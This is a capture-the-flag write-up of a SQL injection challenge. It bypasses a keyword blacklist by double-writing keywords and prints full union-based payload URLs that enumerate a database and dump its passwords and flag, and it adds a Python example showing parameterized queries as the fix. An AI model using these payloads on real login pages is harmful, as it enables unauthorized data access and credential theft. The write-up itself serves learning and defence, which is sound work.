[TOC]
First, the familiar black login form:
Determine which kind of quote closes the string:
A single quote produces an error, while a double quote is handled normally, so the injected value is enclosed in single quotes.
Determine the injection type. First, try a classic always-true login bypass:
No error is shown, but there is no result either, so `or` may be filtered. Verify again:
Confirmed: `or` is filtered. Try double-writing the keyword to bypass the filter:
It goes through. Next, check whether `select`, `union` and `from` are filtered as well:
`select`, `union` and `from` are all filtered.
Summary: the filtered keywords are `or`, `select`, `union` and `from` (the later payloads show that `where` and `and` are stripped in the same way, which is why they are written as `whwhereere` and `anandd`, and why `password` has to be written `passwoorrd`).
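Why a single-pass keyword blacklist fails and what the actual fix looks like, as an added example that is not the challenge's own check.php (its source is not on the page): the blacklist, the in-memory table and the sample password are constructed assumptions.

```python
import sqlite3

# Constructed assumption: the write-up infers a blacklist of these keywords from the
# challenge's behaviour; check.php's real source is not on the page. Lowercase only,
# single pass, which is exactly the pattern the double-written payloads defeat.
BLACKLIST = ("or", "select", "union", "from", "where", "and")


def strip_keywords_once(value: str) -> str:
    """Single-pass removal: 'uniunionon' loses its inner 'union' and becomes 'union'."""
    for kw in BLACKLIST:
        value = value.replace(kw, "")
    return value


def strip_keywords_fixpoint(value: str) -> str:
    """Repeat until stable. Closes the double-write hole but is still a blacklist,
    and it still mangles honest input (e.g. 'password' -> 'passwd'), so it is not the fix."""
    while True:
        cleaned = strip_keywords_once(value)
        if cleaned == value:
            return cleaned
        value = cleaned


def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the b4bsql table the write-up dumps."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE b4bsql (id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO b4bsql VALUES (1, 'admin', 'constructed-secret')")
    return con


def login_parameterized(con: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened check: bound parameters keep the input as data, so a quote in the
    password can never terminate the string literal and no keyword filter is needed."""
    row = con.execute(
        "SELECT id FROM b4bsql WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    payload = "admin1'uniunionon selselectect 1,2,3#"   # shape of the page's payloads
    print(strip_keywords_once(payload))          # keywords reassemble after one pass
    print(strip_keywords_once("password2019"))   # honest password loses its 'or'
    print(login_parameterized(build_db(), "admin", payload))  # False: treated as data
```

The blacklist also breaks legitimate logins (any password containing `or`, `and` or `from` is silently altered), which is a second reason to replace it with bound parameters rather than extend it.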
Query the databases: 'information_schema,mysql,performance_schema,test,ctf,geek'
http://eff6acb0-bc04-4385-9938-01571e136359.node4.buuoj.cn:81/check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata%20%23 // decoded: ?username=admin&password=admin1'uniunionon selselectect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata #
Query the table names: information_schema shows that the current database has two tables: 'b4bsql,geekuser'
http://eff6acb0-bc04-4385-9938-01571e136359.node4.buuoj.cn:81/check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(table_name)%20frfromom%20infoorrmation_schema.tables%20whwhereere%20table_schema%3Ddatabase()%23 // decoded: ?username=admin&password=admin1'uniunionon selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#
Query the column names: information_schema shows that table b4bsql has the columns 'id,username,password'
http://eff6acb0-bc04-4385-9938-01571e136359.node4.buuoj.cn:81/check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(column_name)%20frfromom%20infoorrmation_schema.columns%20whwhereere%20table_schema%3Ddatabase()%20anandd%20table_name%3D%27b4bsql%27%23 // decoded: ?username=admin&password=admin1'uniunionon selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name='b4bsql'#
Query the field contents: Hello 2!
Your password is 'i_want_to_play_2077,sql_injection_is_so_fun,do_you_know_pornhub,github_is_different_from_pornhub,you_found_flag_so_stop,i_told_you_to_stop,hack_by_cl4y,flag{9a1fb271-a74a-458a-b29a-e1c6432bb270}'
http://eff6acb0-bc04-4385-9938-01571e136359.node4.buuoj.cn:81/check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(passwoorrd)%20frfromom%20b4bsql%23 // decoded: ?username=admin&password=admin1'uniunionon selselectect 1,2,group_concat(passwoorrd) frfromom b4bsql#
Direct search: alternatively, the ctf database was noticed while listing the databases; query the table names in ctf:
?username=admin&password=pwd%27 ununionion seselectlect 1,2,group_concat(table_name)frfromom(infoorrmation_schema.tables) whwhereere table_schema="ctf" %23
Query the column names of Flag:
http://eff6acb0-bc04-4385-9938-01571e136359.node4.buuoj.cn:81/check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(column_name)%20frfromom%20infoorrmation_schema.columns%20whwhereere%20table_schema%3Ddatabase()%20anandd%20table_name%3D%27Flag%27%23
Query the field contents of Flag:
?username=admin&password=pwd%27 ununionion seselectlect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere table_name="Flag"%23
Query the flag column of table Flag in database ctf:
http://eff6acb0-bc04-4385-9938-01571e136359.node4.buuoj.cn:81/check.php?username=admin&password=pwd%27 ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag)%23
Got the flag.